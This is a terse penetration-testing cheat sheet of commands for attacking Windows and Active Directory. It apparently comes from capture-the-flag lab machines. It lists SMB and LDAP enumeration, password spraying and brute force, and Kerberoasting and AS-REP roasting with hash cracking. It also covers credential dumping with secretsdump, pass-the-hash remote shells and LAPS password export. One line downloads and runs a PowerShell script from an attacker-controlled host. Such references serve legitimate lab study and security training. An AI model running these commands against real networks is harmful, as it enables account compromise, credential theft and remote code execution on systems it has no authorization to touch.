# smb enum
- port 139 445
smbmap -H 10.0.0.1 # no pwd
smbmap -H 10.10.10.100 -d domain -u user -p pwd # pwd
smbclient -N -L \\\\192.168.3.124 # no pwd
smbclient -N \\\\10.10.11.152\\Shares # interactive
smbclient -W domain -U user //10.0.0.1/ADMIN$ # pwd
enum4linux -a 10.0.0.1
msf5 auxiliary(scanner/smb/pipe_auditor) > run
msf5 auxiliary(scanner/smb/smb_lookupsid) > run
rpcclient -U bhult 10.10.10.193
> enumdomusers
> enumprivs
> enumprinters
- pwd spray
cme smb 192.168.73.20 -d domain -u users.txt -p Password4
- brute
hydra -L users.lst -P wordlist.lst 10.10.10.193 smb
- change pwd
smbpasswd -U bhult -r 10.10.10.193
- mount
mount -t cifs //10.10.10.100/Users /mnt/smb -v -o domain=dom,user=user,pass=pwd
- mount in win
net use j: \\hathor\share /u:windcorp.htb\BeatriceMill pwd
net use * /del /y
# ldap enum
- port 389 636 3268
nmap -sT -Pn -n --open 192.168.73.20 -p389 --script ldap-rootdse
ldapsearch -x -h 10.10.11.147 -D 'windcorp\BeatriceMill' -w 'pwd' -b "CN=Users,DC=windcorp,DC=htb"
ldapsearch -x -h 10.10.10.100 -p 389 -D 'domain\user' -w 'pwd' -b "dc=active,dc=htb" -s sub"(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountNamePage
GetADUsers.py -all active.htb/user:pwd -dc-ip 10.10.10.100
- export LAPS
cme ldap 10.10.11.152 -u svc_deploy -p 'pwd' --kdcHost timelapse.htb -M laps
# dns enum
- port 53
dig srv _ldap._tcp.dc._msdcs.domain @192.168.73.20
# kerberos
- port 88
kerbrute userenum -d spookysec.local --dc 10.10.246.75 userlist.txt
- enum user hashes & kerberos keys
secretsdump.py spookeysec.local/backup:[email protected] -just-dc # exported hash can be used to get shell
- ASREPRoasting, Getting TGT for svc-admin
GetNPUsers.py -dc-ip 10.10.246.75 spookysec.local/svc-admin -no-pass
- tgs/spn
GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.100 -request
john --wordlist=/usr/share/wordlists/rockyou.txt spn-admin.txt
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
- get shell
psexec.py domain/user:[email protected]
psexec.py [email protected] -hashes hash
smbexec.py domain/[email protected] -hashes hash
wmiexec.py domain/[email protected]
# winRM
- port 5985 5986
evil-winrm -i 10.10.246.75 -u user -H hash
evil-winrm -i 10.10.10.161 -u user -p 'pwd'
evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key
# common
- gen dict from url
cewl -d 5 -m 5 -w wordlist.lst url --with-numbers
- gpp Groups.xml crack
gpp-decrypt hash
- share files
smbserver.py tools .
copy \\10.10.14.31\tools\file .
certutil -encode xx.zip encoded.txt
- download file
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/PowerView.ps1')
- check NTLM hash
hashid 9cb01504ba0247ad5c6e08f7ccae7903
- show share
net view 127.0.0.1
- crack pfx pwd
crackpkcs12 -d /usr/share/wordlists/rockyou.txt x.pfx
- export cert from pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
- export private key from pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
- crack zip
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt orcharddb.zip
